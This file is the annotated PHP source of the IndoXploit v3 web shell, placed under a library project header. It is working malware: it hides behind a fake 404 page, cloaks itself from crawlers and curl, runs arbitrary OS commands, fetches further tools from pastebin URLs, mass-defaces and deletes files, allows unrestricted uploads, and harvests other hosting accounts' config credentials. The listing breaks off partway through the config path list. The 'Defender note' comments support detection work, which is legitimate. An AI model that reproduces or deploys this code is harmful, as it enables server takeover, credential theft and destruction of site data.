PROJECT
CSUN - Oviatt Library
name : admin date : 2/5/2009


/*
* # IndoXploit v3 Web Shell (Stealth Version)
* # What was involved?
*   - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
*   - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
* # Important Bookmark
*   - Password configuration at line 27
*   - login_shell() function at line 40-52
*   - Login validation at line 57-64
*/
// Runtime setup for the shell. Almost every call is prefixed with "@" so that
// a failure produces no visible warning.
session_start();
@error_reporting(0);
@set_time_limit(0);

// set_magic_quotes_runtime() is only called on PHP older than 5.3.0.
if(version_compare(PHP_VERSION, '5.3.0', '<')) {
@set_magic_quotes_runtime(0);
}

@clearstatcache();
// Defender note: for its own requests the script blanks error_log and turns
// off log_errors and display_errors, so PHP error logs are not a reliable
// place to look for it. These ini changes do not touch the web server's
// access log.
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);

// Access password, kept as an unsalted MD5 hex digest. It is compared further
// down against md5($_GET['passwd']). Both the digest and the plaintext in the
// trailing comment are usable as indicators when hunting for copies of this file.
$password = "9f3ed52638be652c4d26e8d715c80c66"; # md5: p4kl0nc4t

// Server address: SERVER_ADDR when set, otherwise the Host header resolved via DNS.
$SERVERIP  = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
// Current directory (see path()) with the document root prefix removed.
$FILEPATH  = str_replace($_SERVER['DOCUMENT_ROOT'], "", path());

// Cloaking: any request whose User-Agent contains one of these substrings
// (case-insensitive) gets a bare 404 and nothing else. The list covers search
// crawlers and also "curl" and "PycURL", so a scan made with a default
// command-line client User-Agent sees a 404 for this file even though it exists.
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
// Decoy shown to any visitor who has not authenticated: instead of a login
// form, the visitor receives a copy of the site's own "not found" page.
// The function requests a random numeric path on the same host (host name
// taken from the Host header) with cURL, replaces that path with this
// script's name in the returned body, echoes the result and exits.
// Defender notes: no header() call in this function sets a status line, so
// the response presumably goes out with PHP's default status even though the
// body reads as a 404 (confirm against access logs). Each unauthenticated
// hit also makes the server request /<random number> from itself, which
// should appear as a paired entry in those logs.
function login_shell() {
$random_url = mt_rand(1000000, 247345736453);
$curl = curl_init();
$protocol = 'http://';
// Use https for the self-request when the current request arrived over TLS.
if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { $protocol = 'https://'; }
curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$server_404 = curl_exec($curl);
// Swap the random path for the real script name so the page looks genuine.
$server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
$server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
echo $server_404;
exit;
}
// ?this=phpinfo dumps the full PHP configuration. This check runs before the
// session/password check below, so it is answered without authentication.
if(@$_GET['this'] == "phpinfo") {
echo phpinfo();
exit();
}
// Authentication gate. The session flag is keyed by md5 of the Host header.
// Access is granted when $password is empty or when md5 of the "passwd" query
// parameter equals the stored digest (loose == comparison). Everyone else is
// handed the decoy page by login_shell(), which exits.
// Defender note: the password travels in the query string, so requests
// carrying "passwd=" are recorded in web-server access logs and are a direct
// hunting pivot.
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
    if(empty($password) || (isset($_GET['passwd']) && (md5($_GET['passwd']) == $password))) {
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
        echo "";
    } else {
        login_shell();
}
}
// File download: ?file=<path>&act=download streams the named file as an
// attachment. The path is used as supplied, so any file readable by the PHP
// process can be retrieved this way.
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}

// When magic quotes are active, strip the added slashes from every POST value
// (recursively for nested arrays).
if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
}
?>




IndoXploit





// Returns the directory the shell is operating in.
// When the "dir" query parameter is present, backslashes are normalised to
// forward slashes and the process changes into that directory; a failed
// chdir() is suppressed and the supplied string is returned anyway.
// Without the parameter the current working directory is returned.
// Defender note: the directory is taken from the request as supplied, so
// "dir=" values in access logs show where the operator browsed.
function path() {
if(isset($_GET['dir'])) {
$dir = str_replace("\\", "/", $_GET['dir']);
@chdir($dir);
} else {
$dir = str_replace("\\", "/", getcwd());
}
return $dir;
}

// Wraps $string in the markup registered for $colorid and appends the "off"
// entry; with no string it returns only the entry for $colorid.
// $bold is accepted but not used in this body.
// NOTE(review): all five table entries are empty strings on this page,
// presumably because the original markup was stripped when the page was
// extracted. Confirm against an intact sample.
function color($bold = 1, $colorid = null, $string = null) {
$color = array(
"",   # 0 off
"", # 1 red
"", # 2 lime
"", # 3 white
"", # 4 gold
);

return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
}

// Coarse platform label: "Windows" when PHP_OS begins with "WIN" (any case),
// otherwise "Linux". Every non-Windows platform is reported as Linux.
function OS() {
if (strncasecmp(PHP_OS, "WIN", 3) === 0) {
return "Windows";
}
return "Linux";
}

// Runs $cmd as an operating-system command and returns its output as a string.
// The first available of system(), exec(), passthru() and shell_exec() is
// used, chosen via function_exists(); when none exists the function falls
// through and returns nothing.
// $cmd reaches the shell unmodified. Callers in this file build it by plain
// string concatenation.
// Defender notes: this is the single choke point for command execution in the
// shell. Child processes spawned by the web-server account are the observable
// effect; restricting these four functions in PHP configuration is the usual
// hardening step.
function exe($cmd) {
if(function_exists('system')) {
// system() prints directly, so output is captured through an output buffer.
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
// Output lines are joined without separators.
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}

// Writes the string $file to $filename, opened with fopen() mode $mode.
// The fopen() result is not checked, and nothing is returned.
function save($filename, $mode, $file) {
$handle = fopen($filename, $mode);
fwrite($handle, $file);
fclose($handle);
return;
}

// Downloads one of five named secondary tools from a fixed URL and writes it
// to a fixed file name relative to the current directory. Dies when that
// directory is not writable. Returns the result of curl_exec().
// Defender notes:
//   - The dropped file names (adminer.php, webconsole.php,
//     idx_cgi/cgitelnet1.idx, idx_cgi/cgitelnet2.idx, makman.php) and the
//     outbound requests from the web server to the hosts below are indicators
//     that this feature was used.
//   - TLS peer and host verification are both switched off for the download.
//   - A $name outside the five handled values leaves $get undefined.
//   - The function returns at curl_exec(), so the curl_close(), fclose() and
//     flush calls after it never run.
function getfile($name) {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't spawn $name."));
if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
elseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");
elseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "idx_cgi/cgitelnet1.idx");
elseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "idx_cgi/cgitelnet2.idx");
elseif($name === "LRE") $get = array("https://pastebin.com/raw/PVPfA21i", "makman.php");

// $get[0] is the source URL, $get[1] the local destination.
$fp = fopen($get[1], "w");
$ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $get[0]);
  curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
     curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
     curl_close($ch);
fclose($fp);
ob_flush();
flush();
}

// Returns an object with name, uid, group and gid for display in the banner.
// With the POSIX extension the values come from the effective uid/gid of the
// running process. Without it the function falls back to get_current_user(),
// getmyuid() and getmygid(), which describe the owner of the script file
// rather than the process, and the group name is reported as "?".
function usergroup() {
if(!function_exists('posix_getegid')) {
$user['name'] = @get_current_user();
$user['uid']   = @getmyuid();
$user['gid']   = @getmygid();
$user['group'] = "?";
} else {
// 'uid' and 'gid' briefly hold the full passwd/group records and are then
// overwritten with the numeric ids.
$user['uid'] = @posix_getpwuid(posix_geteuid());
$user['gid'] = @posix_getgrgid(posix_getegid());
$user['name'] = $user['uid']['name'];
$user['uid'] = $user['uid']['uid'];
$user['group'] = $user['gid']['name'];
$user['gid'] = $user['gid']['gid'];
}
return (object) $user;
}

// Enumerates local account names by reading /etc/passwd line by line and
// capturing the text before ":x:". Dies when the file cannot be opened.
// Lines that do not match the pattern still append an entry (an undefined
// capture). The file handle is never closed.
// Defender note: the list is consumed by the "jumping" and "idxconfig" tools
// in this file to probe other accounts' web roots on the same host.
function getuser() {
$fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
while($read = fgets($fopen)) {
preg_match_all('/(.*?):x:/', $read, $getuser);
$user[] = $getuser[1][0];
}
return $user;
}

// Enumerates hosted domain names by scanning /etc/named.conf for zone files
// of the form /var/named/<domain>.db. The fopen() result is not checked and
// the handle is never closed; lines without a match still append an entry.
// Defender note: a PHP process in a web root has no ordinary reason to read
// /etc/named.conf. An open_basedir restriction or file permissions that deny
// the web account would block this lookup.
function getdomainname() {
$fopen = fopen("/etc/named.conf", "r");
while($read = fgets($fopen)) {
preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
$domain[] = $getdomain[1][0];
}
return $domain;
}

// Formats a byte count for display using binary units.
// Values of 1024 and above are shown with two decimals in the largest unit
// they reach (KB, MB or GB); smaller values are shown unchanged with " B".
function hddsize($size) {
// Largest unit first, so the first threshold the value reaches wins.
$units = array(
' GB' => 1073741824,
' MB' => 1048576,
' KB' => 1024,
);
foreach($units as $suffix => $divisor) {
if($size >= $divisor) {
return sprintf('%1.2f', $size / $divisor).$suffix;
}
}
return $size.' B';
}

// Returns an object with the total, free and used space of "/" for the banner.
// 'size' and 'free' are already formatted strings from hddsize(), so 'used'
// is the difference of two formatted strings rather than of two byte counts.
function hdd() {
$hdd['size'] = hddsize(disk_total_space("/"));
$hdd['free'] = hddsize(disk_free_space("/"));
$hdd['used'] = $hdd['size'] - $hdd['free'];
return (object) $hdd;
}

// Returns the label $perms coloured by whether $path is writable for the PHP
// process: colour id 2 when writable, colour id 1 when not.
function writeable($path, $perms) {
if(is_writable($path)) {
return color(1, 2, $perms);
}
return color(1, 1, $perms);
}

// Renders the mode of $path as a ten-character string in the style of
// "ls -l": one file-type character followed by the owner, group and world
// read/write/execute triads, including setuid, setgid and sticky markers.
function perms($path) {
$mode = fileperms($path);

// File-type masks are tested in this order; the first full match wins and
// 'u' (unknown) is used when none matches.
$kinds = array(
array(0xC000, 's'), // socket
array(0xA000, 'l'), // symbolic link
array(0x8000, '-'), // regular file
array(0x6000, 'b'), // block special
array(0x4000, 'd'), // directory
array(0x2000, 'c'), // character special
array(0x1000, 'p'), // FIFO pipe
);
$text = 'u';
foreach($kinds as $kind) {
if(($mode & $kind[0]) == $kind[0]) {
$text = $kind[1];
break;
}
}

// Each row: read bit, write bit, execute bit, special bit, and the letters
// used when the special bit is set with and without execute.
$triads = array(
array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
);
foreach($triads as $triad) {
list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $triad;
$text .= ($mode & $readBit) ? 'r' : '-';
$text .= ($mode & $writeBit) ? 'w' : '-';
if($mode & $execBit) {
$text .= ($mode & $specialBit) ? $withExec : 'x';
} else {
$text .= ($mode & $specialBit) ? $withoutExec : '-';
}
}

return $text;
}

// Builds the one-line capability summary shown in the banner: whether the
// mysql and cURL PHP extensions are loaded, and whether wget, perl and python
// produce any output when run with --help through exe().
// Defender note: every page load that renders the banner therefore spawns
// "wget --help", "perl --help" and "python --help" from the web-server
// account, a recognisable burst in process telemetry.
function lib_installed() {
$lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
$lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
return implode(" | ", $lib);
}

// Prints the current directory one path segment at a time, each followed by
// "/", and on Windows appends the drive list from windisk().
// NOTE(review): $key is unused here and the printed segments carry no markup,
// presumably because the original link markup was stripped from this page.
function pwd() {
$dir = explode("/", path());
foreach($dir as $key => $index) {
print "$index/";
}
print "
";
print (OS() === "Windows") ? windisk() : "";
}

// Prints the drive letters found on a Windows host. "A" is always listed;
// every other letter is listed when "<letter>:\" is a directory. The letter
// matching the first component of the current path is highlighted.
// NOTE(review): $quicklaunch is never assigned in this function, so the
// second half operates on an undefined variable. It looks like a leftover
// from another script.
function windisk() {
$letters = "";
$v = explode("\\", path());
$v = $v[0];
foreach(range("A", "Z") as $letter) {
   $bool = $isdiskette = in_array($letter, array("A"));
   if(!$bool) $bool = is_dir("$letter:\\");
   if($bool) {
   $letters .= "[ ";
   if($letter.":" != $v) {
   $letters .= $letter;
   }
   else {
   $letters .= color(1, 2, $letter);
   }
   $letters .= "
]";
   }
}
if(!empty($letters)) {
print "Detected Drives $letters
";
}
if(count($quicklaunch) > 0) {
foreach($quicklaunch as $item) {
   $v = realpath(path(). "..");
   if(empty($v)) {
   $a = explode(DIRECTORY_SEPARATOR,path());
   unset($a[count($a)-2]);
   $v = join(DIRECTORY_SEPARATOR, $a);
   }
   print "".$item[0]."";
}
}
}

// Prints the reconnaissance banner shown at the top of every shell page:
// server and client IP, web-server software, uname string, the account the
// code runs as, disk usage, PHP version, safe_mode, the disable_functions
// list, the tool summary from lib_installed(), and the permissions of the
// current directory, followed by the path from pwd().
// Defender note: this single function collects most of what an operator
// needs to plan further steps on the host. Rendering it calls usergroup()
// four times, hdd() three times and spawns the processes described at
// lib_installed().
function serverinfo() {
$disable_functions = @ini_get('disable_functions');
$disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");

$output[] = "SERVER IP ".color(1, 2, $GLOBALS['SERVERIP'])." / YOUR IP ".color(1, 2, $_SERVER['REMOTE_ADDR']);
$output[] = "WEB SERVER  : ".color(1, 2, $_SERVER['SERVER_SOFTWARE']);
$output[] = "SYSTEM      : ".color(1, 2, php_uname());
$output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
$output[] = "HDD         : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
$output[] = "PHP VERSION : ".color(1, 2, @phpversion());
$output[] = "SAFE MODE   : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
$output[] = "DISABLE FUNC: $disable_functions";
$output[] = lib_installed();
$output[] = "Current Dir (".writeable(path(), perms(path())).") ";

print "
";
print implode("
", $output);
pwd();
print "
";

}

// Small HTTP client: fetches $url and returns the response body (or false on
// failure). When $post is truthy, $data is sent as the POST body.
// Redirects are followed, and the connect and total timeouts are 10 seconds.
// TLS peer and host verification are both disabled, so the response is not
// authenticated. The curl_close() after the return statement never runs.
function curl($url, $post = false, $data = null) {
    $ch = curl_init($url);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
       curl_setopt($ch, CURLOPT_TIMEOUT, 10);
       curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    if($post) {
       curl_setopt($ch, CURLOPT_POST, true);
       curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    return curl_exec($ch);
  curl_close($ch);
}

// Reverse-IP lookup: posts this server's IP address to a third-party lookup
// service and returns the domains it reports, each prefixed with "http://".
// The response is reduced to a comma-separated list by a chain of
// str_replace() calls rather than parsed as JSON, and the first element of
// the split is discarded.
// Defender note: an outbound POST from the web server to
// domains.yougetsignal.com carrying the server's own address is an indicator
// that this feature ran.
function reverse() {
$response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS['SERVERIP']."&ket=");
$response = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $response)))))))))))));
$explode  = explode(",,", $response);
unset($explode[0]);

foreach($explode as $domain) {
$domain = "http://$domain";
$domain = str_replace(",", "", $domain);
$url[] = $domain;
ob_flush();
flush();
}

return $url;
}

// Returns the part of $param that lies between the first occurrence of
// $kata1 and the next occurrence of $kata2 after it.
// Returns FALSE when either marker does not occur anywhere in $param.
function getValue($param, $kata1, $kata2){
    $openAt = strpos($param, $kata1);
    if($openAt === FALSE) {
        return FALSE;
    }
    if(strpos($param, $kata2) === FALSE) {
        return FALSE;
    }
    // The closing marker is searched for only after the opening one ends.
    $from = $openAt + strlen($kata1);
    $to = strpos($param, $kata2, $from);
    return substr($param, $from, $to - $from);
}

// Writes the content $file under the name $filename into every writable
// sub-directory of $dir, printing one line per directory. With $type set to
// "-alldir" it recurses into each of those sub-directories.
// The "." and ".." entries are written to as well, which puts a copy in $dir
// itself and in its parent, without a writability check or status line.
// Defender note: the footprint is many files with the same name, identical
// content and near-identical modification times spread across a directory
// tree. File-integrity monitoring or a search by name or hash finds them, and
// restoring from a known-good backup is the usual recovery.
function massdeface($dir, $file, $filename, $type = null) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path     = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === "." || $dir_ === "..") {
file_put_contents($location, $file);
}
else {
if(is_dir($path) AND is_writable($path)) {
print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
";
file_put_contents($location, $file);
if($type === "-alldir") {
massdeface($path, $file, $filename, "-alldir");
}
}
}
}
}

// Deletes files named $filename from $dir, from the parent of $dir, and from
// every writable sub-directory of $dir that contains one. It recurses only
// into sub-directories where a file was actually found and removed.
// Defender note: this is destructive and also serves to clean up after
// massdeface(). Deleted paths are echoed to the operator, not logged on disk.
function massdelete($dir, $filename) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path     = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === '.') {
if(file_exists("$dir/$filename")) {
unlink("$dir/$filename");
}
}
elseif($dir_ === '..') {
if(file_exists(dirname($dir)."/$filename")) {
unlink(dirname($dir)."/$filename");
}
}
else {
if(is_dir($path) AND is_writable($path)) {
if(file_exists($location)) {
print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
";
unlink($location);
massdelete($path, $filename);
}
}
}
}
}

// Dispatcher for the shell's operator features. $toolsname selects the
// feature and $args carries its argument string. Branches, in order:
//   cmd        - prints the command prompt line
//   readfile   - prints a file's content, HTML-escaped
//   spawn      - drops secondary tools (adminer, webconsole, cgitelnet1/2, phpinfo)
//   upload     - stores an uploaded file in the current dir or document root
//   jumping    - probes other accounts' web roots for read/write access
//   idxconfig  - copies other accounts' application config files
//   network    - starts a back-connect ("bc") or bind-port ("bp") shell
//   krdp       - creates a local administrator account on Windows
// NOTE(review): most print statements in this function emit empty strings on
// this page, presumably because the original HTML was stripped on extraction.
function tools($toolsname, $args = null) {
if($toolsname === "cmd") {
print "

  ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $
  
  
  
";
}
elseif($toolsname === "readfile") {
// $msg is not defined anywhere in this function.
if(empty($args)) die(color(1, 1, $msg));
if(!is_file($args)) die(color(1, 1, "File '$args' is not exists."));

print "
";
print htmlspecialchars(file_get_contents($args));
print "
";
}
elseif($toolsname === "spawn") {
// Defender note: each sub-branch leaves a file in the current directory
// (adminer.php, webconsole.php, idx_cgi/*.idx, phpinfo.php). Finding any of
// them next to an unexpected PHP file is a sign this shell was used.
if($args === "adminer") {
if(file_exists("adminer.php")) {
print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'Adminer'."));
if(getfile("adminer")) {
print "Login Adminer: http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/adminer.php";
}
else {
print color(1, 1, "Error while downloading file Adminer.");
@unlink("adminer.php");
}
}
}
elseif($args === "webconsole") {
if(file_exists("webconsole.php")) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'WebConsole'."));
if(getfile("webconsole")) {
print "";
}
else {
print color(1, 1, "Error while downloading file WebConsole.");
@unlink("webconsole.php");
}
}
}
elseif($args === "cgitelnet1") {
if(file_exists("idx_cgi/cgitelnet1.idx")) {
print "";
}
elseif(file_exists('cgitelnet1.idx')) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
// Creates idx_cgi/ with an .htaccess that maps the .idx extension to the CGI
// handler, so the downloaded script runs outside PHP's own restrictions.
// An .htaccess containing "AddHandler cgi-script .idx" is a strong indicator.
if(!is_dir(path()."/idx_cgi/")) {
@mkdir('idx_cgi', 0755);
save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
}
if(getfile("cgitelnet1")) {
chmod('idx_cgi/cgitelnet1.idx', 0755);
print "";
}
else {
print color(1, 1, "Error while downloading file CGI Telnet.");
// Cleanup on failure: rmdir first, then a recursive delete through exe().
@rmdir(path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
}
}

}
elseif($args === "cgitelnet2") {
// Same flow as cgitelnet1, for the second CGI script.
if(file_exists("idx_cgi/cgitelnet2.idx")) {
print "";
}
elseif(file_exists('cgitelnet2.idx')) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_cgi'."));
if(!is_dir(path()."/idx_cgi/")) {
@mkdir('idx_cgi', 0755);
save("idx_cgi/.htaccess", "w", "AddHandler cgi-script .idx");
}
if(getfile("cgitelnet2")) {
chmod('idx_cgi/cgitelnet2.idx', 0755);
print "";
}
else {
print color(1, 1, "Error while downloading file CGI Telnet.");
@rmdir(path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/idx_cgi/");
if(!@rmdir(path()."/idx_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/idx_cgi/");
}
}

}
elseif($args === "phpinfo") {
if(file_exists('phpinfo.php') AND preg_match("/phpinfo()/", file_get_contents('phpinfo.php'))) {
print "";
}
else {
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create file 'phpinfo'."));
save("phpinfo.php", "w", "
'; phpinfo(); print '
'; ?>");
print "";
}
}
}
elseif($toolsname === "upload") {
// The uploaded file is copied under the client-supplied name with no check
// of type, extension or path. Type '1' targets the current directory and
// type '2' the document root.
if($_POST['upload']) {
if($_POST['uploadtype'] === '1') {
if(@copy($_FILES['file']['tmp_name'], path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."")) {
$act = color(1, 2, "Uploaded!")." at ".path().DIRECTORY_SEPARATOR.$_FILES['file']['name']."";
}
else {
$act = color(1, 1, "Failed to upload file!");
}
}
elseif($_POST['uploadtype'] === '2') {
$root = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
$web = $_SERVER['HTTP_HOST'].DIRECTORY_SEPARATOR.$_FILES['file']['name'];
if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
if(@copy($_FILES['file']['tmp_name'], $root)) {
$act = color(1, 2, "Uploaded!")." at $root -> $web";
}
else {
$act = color(1, 1, "Failed to upload file!");
}
}
else {
$act = color(1, 1, "Failed to upload file!");
}
}
}
print "Upload File: $act
  

  current_dir [ ".writeable(path(), "Writeable")." ]
  document_root [ ".writeable($_SERVER['DOCUMENT_ROOT'], "Writeable")." ]

  
  
  
";
}
elseif($toolsname === "jumping") {
// Cross-account probe for shared hosting: for every name from getuser(),
// tests whether /home/<user>/public_html is readable or writable by this
// process and tries to match the account to a domain via /etc/valiases.
// Defender note: any hit means one tenant's web process can read another
// tenant's files. Per-account isolation and home directories that are not
// world-readable remove the exposure.
$i = 0;
foreach(getuser() as $user) {
$path = "/home/$user/public_html";
if(is_readable($path)) {
$status = color(1, 2, "[R]");
if(is_writable($path)) {
$status = color(1, 2, "[RW]");
}
$i++;
print "$status ".color(1, 4, $path)."";
if(!function_exists('posix_getpwuid')) print "
";
if(!getdomainname()) print " => ".color(1, 1, "Can't get domain name")."
";
foreach(getdomainname() as $domain) {
$userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
$userdomain = $userdomain->name;
if($userdomain === $user) {
print " => ".color(1, 2, $domain)."
";
break;
}
}
}
}
print ($i === 0) ? "" : "

".color(1, 3, "Total ada $i kamar di ".$GLOBALS['SERVERIP'])."

";
}
elseif($toolsname === "idxconfig") {
// Credential harvesting on shared hosting: for each account whose web root
// is readable, tries a fixed list of well-known application config paths and
// copies every non-empty one to idx_config/<user>-<application>.txt.
// Defender notes:
//   - An idx_config/ directory whose .htaccess contains
//     "DirectoryIndex indoxploit.htm" is a direct indicator. Treat every
//     database or panel credential in the copied files as compromised and
//     rotate it.
//   - The harvest runs only when idx_config/ does not exist yet.
//   - Config files readable only by their owning account defeat this loop.
//   - The handles opened with fopen() below are never closed.
if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_config'."));
if(!is_dir(path()."/idx_config/")) {
@mkdir('idx_config', 0755);
$htaccess = "Options all\nDirectoryIndex indoxploit.htm\nSatisfy Any";
save("idx_config/.htaccess","w", $htaccess);

foreach(getuser() as $user) {
$user_docroot = "/home/$user/public_html/";
if(is_readable($user_docroot)) {
// Map of candidate file path => application label used in the output name.
$getconfig = array(
"/home/$user/.accesshash" => "WHM-accesshash",
"$user_docroot/config/koneksi.php" => "Lokomedia",
"$user_docroot/forum/config.php" => "phpBB",
"$user_docroot/sites/default/settings.php" => "Drupal",
"$user_docroot/config/settings.inc.php" => "PrestaShop",
"$user_docroot/app/etc/local.xml" => "Magento",
"$user_docroot/admin/config.php" => "OpenCart",
"$user_docroot/application/config/database.php" => "Ellislab",
"$user_docroot/vb/includes/config.php" => "Vbulletin",
"$user_docroot/includes/config.php" => "Vbulletin",
"$user_docroot/forum/includes/config.php" => "Vbulletin",
"$user_docroot/forums/includes/config.php" => "Vbulletin",
"$user_docroot/cc/includes/config.php" => "Vbulletin",
"$user_docroot/inc/config.php" => "MyBB",
"$user_docroot/includes/configure.php" => "OsCommerce",
"$user_docroot/shop/includes/configure.php" => "OsCommerce",
"$user_docroot/os/includes/configure.php" => "OsCommerce",
"$user_docroot/oscom/includes/configure.php" => "OsCommerce",
"$user_docroot/products/includes/configure.php" => "OsCommerce",
"$user_docroot/cart/includes/configure.php" => "OsCommerce",
"$user_docroot/inc/conf_global.php" => "IPB",
"$user_docroot/wp-config.php" => "Wordpress",
"$user_docroot/wp/test/wp-config.php" => "Wordpress",
"$user_docroot/blog/wp-config.php" => "Wordpress",
"$user_docroot/beta/wp-config.php" => "Wordpress",
"$user_docroot/portal/wp-config.php" => "Wordpress",
"$user_docroot/site/wp-config.php" => "Wordpress",
"$user_docroot/wp/wp-config.php" => "Wordpress",
"$user_docroot/WP/wp-config.php" => "Wordpress",
"$user_docroot/news/wp-config.php" => "Wordpress",
"$user_docroot/wordpress/wp-config.php" => "Wordpress",
"$user_docroot/test/wp-config.php" => "Wordpress",
"$user_docroot/demo/wp-config.php" => "Wordpress",
"$user_docroot/home/wp-config.php" => "Wordpress",
"$user_docroot/v1/wp-config.php" => "Wordpress",
